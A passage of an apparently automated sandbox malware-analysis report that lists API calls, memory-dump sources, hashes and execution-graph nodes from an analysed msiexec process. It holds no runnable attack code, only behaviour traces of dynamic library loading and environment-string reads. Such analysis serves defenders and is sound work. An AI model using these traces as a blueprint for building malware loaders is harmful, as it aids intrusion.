                                                                                                                                                                                                          • Opcode ID: fe6901fdce520359a73fc50e746a5c3783f36dea72ba0b80f95dc1e1945e3c2e
                                                                                                                                                                                                          • Instruction ID: ffaa868eac833f489218961a2c0238fbe49e13635c8cce5b42053957219a09ff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe6901fdce520359a73fc50e746a5c3783f36dea72ba0b80f95dc1e1945e3c2e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8221B636A00204EFD7059B54DC84EEE77B8EF8C715F14441EE508EB151DF74AA4587B5
                                                                                                                                                                                                          Function 21DE7153 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 21DE715C
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 21DE717F
                                                                                                                                                                                                            • Part of subcall function 21DE56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21DE5702
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 21DE71A5
                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 21DE71C7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                          • Opcode ID: bf253b145a89adb6ea1fea60382806404be09e8d7d3cb7248d47b908476186b7
                                                                                                                                                                                                          • Instruction ID: 57e8286e511691e23307ab73bb5e8a93590098840796f51bfb7c000240bbfe0f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf253b145a89adb6ea1fea60382806404be09e8d7d3cb7248d47b908476186b7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A018872601725FF67511AB65C4CD7B6E6EDAC7AE6314026DBF08C7200DE65CC0182F1
                                                                                                                                                                                                          Function 214E9622 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 214E962B
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 214E964E
                                                                                                                                                                                                            • Part of subcall function 214E5A9F: RtlAllocateHeap.NTDLL(00000000,214DA5B7,?), ref: 214E5AD1
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 214E9674
                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 214E9696
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                                          • Opcode ID: 05e68579455cda8b550a681d6391a5de6dfa3db1c7bbed7c79284ce8b4d84b75
                                                                                                                                                                                                          • Instruction ID: 57d3b025d985ce5e080d159b4ae7128940bced448e9fd909639f834fd3b104a3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e68579455cda8b550a681d6391a5de6dfa3db1c7bbed7c79284ce8b4d84b75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60015266A022157F27211A769C8CC7B6E6DDBC6E62312011EBE0CC6380DE748C01CAB0
                                                                                                                                                                                                          Function 21DEC7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(21DEC7DD), ref: 21DEC7E6
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,21DEC7DD), ref: 21DEC838
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 21DEC860
                                                                                                                                                                                                            • Part of subcall function 21DEC803: GetProcAddress.KERNEL32(00000000,21DEC7F4), ref: 21DEC804
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1646373207-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: 05339d9331769f2d432ff5c392d87dff12aa66369e7fc6aed52ae5ef77b2f3e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5601261054524AFCB61352740ECDAAA6FDC9B2B673B101F5EE24CC61A3C99C8501C3B6
                                                                                                                                                                                                          Function 214F179D Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(214F1794), ref: 214F179D
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,214F1794), ref: 214F17EF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 214F1817
                                                                                                                                                                                                            • Part of subcall function 214F17BA: GetProcAddress.KERNEL32(00000000,214F17AB), ref: 214F17BB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1646373207-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: c4832d1a3a487925b9055279768382425e14906c29a927184ac5a0d55823a243
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5701F101A452823DFB1256B50E41AFB9FCCDB33EA0F10074EA20DD7393C9B0810693B2
                                                                                                                                                                                                          Function 214DCB26 Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,?,?,214DCACD,?,?,?,?), ref: 214DCB5E
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,214DCACD,?,?,?,?), ref: 214DCB6A
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,214DCACD,?,?,?,?), ref: 214DCB78
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          • Opcode ID: 6f5d35ebabc4ae897b577d68f95f9461fcea9c2cb680c79dd05c9dd75f509516
                                                                                                                                                                                                          • Instruction ID: 82bead8dabf114de8a48e426bcdae5d90a60252f1106c0e524f11a7bace7014f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f5d35ebabc4ae897b577d68f95f9461fcea9c2cb680c79dd05c9dd75f509516
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1301D83324523B5BCB124E39AC65E477758EF4A661B100538EE4ED7381DE34D61197E4
                                                                                                                                                                                                          Function 21DE5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21DE1D66,00000000,00000000,?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue), ref: 21DE5D13
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue,21DEE190,FlsSetValue,00000000,00000364,?,21DE5BC8), ref: 21DE5D1F
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21DE5C88,21DE1D66,00000000,00000000,00000000,?,21DE5E85,00000006,FlsSetValue,21DEE190,FlsSetValue,00000000), ref: 21DE5D2D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          • Opcode ID: 56f9abb91094481852e2c2e03d23e8556adec45edcf3d038f920584b31acb734
                                                                                                                                                                                                          • Instruction ID: f04c07d8cd1c705cdf842890a6c92f408e9c3f6c775acb27aa479d8374f35493
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f9abb91094481852e2c2e03d23e8556adec45edcf3d038f920584b31acb734
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3901AC3A651632EBC7125E6C9C4CE467B5CAF0A6F37150628F91ED7140DB36D512C7E0
                                                                                                                                                                                                          Function 214E6C81 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue), ref: 214E6CB3
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue,214F3FF8,214F4000,00000000,00000364,?,214E6B4E), ref: 214E6CBF
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,214E6C28,?,00000000,00000000,00000000,?,214E6E99,00000006,FlsSetValue,214F3FF8,214F4000,00000000), ref: 214E6CCD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          • Opcode ID: 94e2830af36c4ed0d852cbbbb300f32ec0df89cfbc521f85fab0e26ab5a53d67
                                                                                                                                                                                                          • Instruction ID: 25431042d96938e8315a0c7eed57434d2e39fe0e2cf6074ce3490ae41aa26c41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94e2830af36c4ed0d852cbbbb300f32ec0df89cfbc521f85fab0e26ab5a53d67
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F301F736A55232ABC7118A698D48E567B9CEF066A2F110624FE0ED3342DB34D531CBE0
                                                                                                                                                                                                          Function 21DE2264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 21DE2276
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 21DE2285
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 21DE228E
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 21DE229B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                          • Opcode ID: b0c2d6029140f28fb5b4f9a84036533389f82bb47f7afb2a5da8ba9515586075
                                                                                                                                                                                                          • Instruction ID: db185fc04b71fc918e52a072d2ce7601de1622b36541a31188edfb11394c848e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c2d6029140f28fb5b4f9a84036533389f82bb47f7afb2a5da8ba9515586075
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F0AF70C10208EBCB00DBB0C549A9EBBF8FF08346F5144959402E7100EB38AB158B50
                                                                                                                                                                                                          Function 214DC107 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 214DC12E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                          • Opcode ID: 94055b8e00c7f54b4e2a28e41b51943ede9a447a884514e96a0c9293cbda8c28
                                                                                                                                                                                                          • Instruction ID: b60a5585ab543e1e41d050d371f9af0a4530765a01afa8abbe7eba7916a39f85
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94055b8e00c7f54b4e2a28e41b51943ede9a447a884514e96a0c9293cbda8c28
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD416B3250010DEFDF02CF94C890EAEBBAAEF59714F25818DEA1C57251C335EA51DB90

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:5.8%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                          Signature Coverage:0.3%
                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                          Total number of Limit Nodes:74
                                                                                                                                                                                                          execution_graph 40275 441819 40278 430737 40275->40278 40277 441825 40279 430756 40278->40279 40280 43076d 40278->40280 40281 430774 40279->40281 40282 43075f 40279->40282 40280->40277 40293 43034a memcpy 40281->40293 40292 4169a7 11 API calls 40282->40292 40285 4307ce 40286 430819 memset 40285->40286 40294 415b2c 11 API calls 40285->40294 40286->40280 40287 43077e 40287->40280 40287->40285 40290 4307fa 40287->40290 40289 4307e9 40289->40280 40289->40286 40295 4169a7 11 API calls 40290->40295 40292->40280 40293->40287 40294->40289 40295->40280 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37965 40dd07 memset 37891->37965 37892 412827 37970 40db69 memset 37892->37970 37896 412822 37992 4125b6 ??3@YAXPAX DeleteObject 37896->37992 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37975 41268e 37898->37975 37900 412966 37993 40b1ab free free 37900->37993 37991 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37991 37905 41296f 37994 40b633 37905->37994 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37998 40a804 memset 37930->37998 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38020 38009 444722 37941->38009 37946 41259b wcscpy 37946->37886 38025 40b1ab free free 37947->38025 37949 40ad76 38026 40aa04 37949->38026 37952 40a9ce malloc memcpy free free 37955 40ac5c 37952->37955 37953 40ad4b 37953->37949 38049 40a9ce 37953->38049 37955->37949 37955->37952 37955->37953 37956 40ace7 free 37955->37956 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956->37955 37960 40a8d0 7 API calls 37960->37949 37961 40ada2 37962 40adc9 37961->37962 37964 40adaa 37961->37964 37962->37891 37962->37892 37963 40adb3 _wcsicmp 37963->37962 37963->37964 37964->37962 37964->37963 38054 40dce0 37965->38054 37967 40dd3a GetModuleHandleW 38059 40dba7 37967->38059 37971 40dce0 3 API calls 37970->37971 37972 40db99 37971->37972 38131 40dae1 37972->38131 38145 402f3a 37975->38145 37977 412766 37977->37896 37977->37901 37978 4126d3 _wcsicmp 37979 4126a8 37978->37979 37979->37977 37979->37978 37981 41270a 37979->37981 38179 4125f8 7 API calls 37979->38179 37981->37977 38148 411ac5 37981->38148 37991->37907 37992->37900 37993->37905 37995 40b640 37994->37995 37996 40b639 free 37994->37996 37997 40b1ab free free 37995->37997 37996->37995 37997->37913 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37931 38004->37934 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37946 38019->38019 38020->37941 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a free 38026->38028 38027->37961 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 free 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 free 38034->38037 38035->38034 38038 4099f4 3 API calls 38036->38038 38039 40a93e memcpy 38037->38039 38040 40a93d 38038->38040 38039->37955 38040->38039 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 free 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc free 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37960 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37967 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38074->38075 38114 40da80 38075->38114 38078->38056 38080 40dbb4 memset memset 38079->38080 38081 409bca GetModuleFileNameW 38080->38081 38081->38063 38084 4447f4 38082->38084 38083 40dc1b 38083->38066 38083->38067 38084->38083 38085 444807 ??2@YAPAXI 38084->38085 38086 44481f 38085->38086 38087 444873 _snwprintf 38086->38087 38088 4448ab wcscpy 38086->38088 38121 44474a 8 API calls 38087->38121 38090 4448bb 38088->38090 38122 44474a 8 API calls 38090->38122 38091 4448a7 38091->38088 38091->38090 38093 4448cd 38123 44474a 8 API calls 38093->38123 38095 4448e2 38124 44474a 8 API calls 38095->38124 38097 4448f7 38125 44474a 8 API calls 38097->38125 38099 44490c 38126 44474a 8 API calls 38099->38126 38101 444921 38127 44474a 8 API calls 38101->38127 38103 444936 38128 44474a 8 API calls 38103->38128 38105 44494b 38129 44474a 8 API calls 38105->38129 38107 444960 ??3@YAXPAX 38107->38083 38109 44db70 38108->38109 38110 40d702 memset GetPrivateProfileStringW 38109->38110 38111 40d752 38110->38111 38112 40d75c WritePrivateProfileStringW 38110->38112 38111->38112 38113 40d758 38111->38113 38112->38113 38113->38070 38115 44db70 38114->38115 38116 40da8d memset 38115->38116 38117 40daac LoadStringW 38116->38117 38118 40dac6 38117->38118 38118->38117 38120 40dade 38118->38120 38130 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38118->38130 38120->37896 38121->38091 38122->38093 38123->38095 38124->38097 38125->38099 38126->38101 38127->38103 38128->38105 38129->38107 38130->38118 38141 409b98 GetFileAttributesW 38131->38141 38133 40daea 38134 40db63 38133->38134 38135 40daef wcscpy wcscpy GetPrivateProfileIntW 38133->38135 38134->37897 38142 40d65d GetPrivateProfileStringW 38135->38142 38137 40db3e 38143 40d65d GetPrivateProfileStringW 38137->38143 38139 40db4f 38144 40d65d GetPrivateProfileStringW 38139->38144 38141->38133 38142->38137 38143->38139 38144->38134 38180 40eaff 38145->38180 38149 411ae2 memset 38148->38149 38150 411b8f 38148->38150 38221 409bca 